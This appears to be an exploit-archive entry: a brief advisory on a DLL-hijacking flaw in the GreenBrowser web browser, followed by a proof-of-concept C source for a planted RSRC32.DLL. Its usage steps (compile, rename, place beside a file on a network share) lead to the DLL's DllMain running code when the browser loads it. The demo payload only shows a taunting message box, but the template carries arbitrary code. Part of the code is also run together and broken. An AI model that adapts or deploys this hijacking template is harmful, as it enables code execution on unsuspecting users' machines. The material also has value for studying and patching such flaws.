// source: https://www.securityfocus.com/bid/43414/info
GreenBrowser is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file./*#GreenBrowser DLL Hijacking Exploit (RSRC32.DLL)#Author : anT!-Tr0J4n#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ ,All Dev-poinT members and my friends#contact: D3v-PoinT@hotmail.com & C1EH@Hotmail.com# Software Link:http://www.morequick.com/indexen.htm#Tested on: Windows XP sp3#how to use :
Complile and rename to RSRC32.DLL. Place it in the same dirExecute to check the
result > Hack3d
#RSRC32.dll (code)*/#include "stdafx.h"
void init(){
MessageBox(NULL,"anT!-Tr0J4n","own33d",0x00000003);}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORDul_reason_for_call,
LPVOID lpReserved
){switch(ul_reason_for_call){
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;}return TRUE;}